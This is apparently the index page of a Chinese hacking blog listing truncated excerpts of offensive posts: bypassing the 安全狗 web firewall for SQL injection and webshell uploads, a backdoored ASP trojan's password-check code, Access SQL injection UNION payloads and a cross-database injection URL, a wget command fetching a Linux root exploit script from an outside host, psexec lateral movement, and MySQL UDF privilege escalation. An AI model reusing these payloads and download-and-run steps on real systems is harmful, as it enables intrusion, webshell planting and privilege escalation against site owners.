小马博客

一个无聊的人,一个无聊的博客

安全狗很牛吗? 无视!! 过安全狗主要过哪几方面: 作者:鬼哥 版权:www.90sec.org 1.过注入 2.过大马被阻拦访问 3.过菜刀连接一句话被拦截 4.过1.asp;.jpg这样的文件 其他我没遇到了。。 现在一点一点讲: 1.过注入 方法一:a.asp?...

发布 0 条评论

在邪红色论坛看到的,标题是《邪红色内部ASP小木马【跨年发布】》 进去看了下介绍,就下载过来研究下,如图是论坛的介绍: 后门地址: 看代码的380行: If MD5(Request("pwd"))=Userpwd or Request("pwd")=Request.ServerVariables("U...

发布 1 条评论

空闲之余在国内外找了一些 bypass 防注入的代码,最后整理成了这个小文章. 让大牛们见笑了。 [Downlink href="http://www.i0day.com/uploads/2012/12/突破防注入的技巧.pdf"]突破防注入的技巧下载[/Downlink] [docs]http://www.i0day....

发布 0 条评论

Access SQL注入参考 描述 SQL查询及注释 注释符 Access中没有专门的注释符号.因此"/*", "--"和"#"都没法使用.但是可以使用空字符"NULL"(%00)代替: ' UNION SELECT 1,1,1 FROM validTableName%00 语法错误信息 "[Micro...

发布 0 条评论

是否大家遇到虚拟主机提权的时候,有这种情况,不管你写哪都提示的 "拒绝访问"? 原因大多数是麦咖啡的一个功能,只让特定的目录可以执行程序,比如(c:\progra~1和c:\windows\system32\)这些目录区执行程序,当然这些目录不可能让你写...

发布 0 条评论

虚拟主机小技巧 看到现在很多同学在发帖了,https://www.t00ls.net/viewthread ... p;extra=&page=1 看了这贴后我有个技巧跟这个同学的很相似。但是老电脑留在学校了,现在的电脑什么都没有,我只能提一下了。测试成功的同学可以...

发布 0 条评论

1.Access跨库查询. http://www.wooyun.com/news/type.asp?type?id=1 and 1=2 union select 1,2,user,4,5,6 from [C:\root\data\%23db1.asp].admin 条件:分站有注入,知道对方站的路径可以用这个方法来跨库查询. [C:\root\data\%23db1.a...

发布 0 条评论

linux各种版本的 exp地址:http://dl.packetstormsecurity.net/UNIX/penetration/rootkits/var.txt 使用demo   [task] yaseng@UAUC:~$ wget http://dl.packetstormsecurity.net/UNIX/penetration/rootkits/var.txt -O root.pl ya...

发布 0 条评论

0x01 背景 内网渗透中经常用到psexec这个工具,可以很方便的得到一个半交互式的cmd shell。 但是psexec也有一些问题:psexec需要对方开启ADMIN$共享,而且需要安装服务;另外,psexec退出时有可能服务删除失败,这个情况只是偶尔,但...

发布 0 条评论

[+]小菜文章,大牛飞过!! 适用环境:PhpMyAdmin 3.x  ,  MySQL>5.1  ,  无Shell  ,  无法爆绝对路径 前提条件: 有MYSQL的ROOT权限 思路:利用NTFS ADS创建 plugin目录 ---- 导出UDF 过程: 查询 select @@basedir  (或者 select...

发布 1 条评论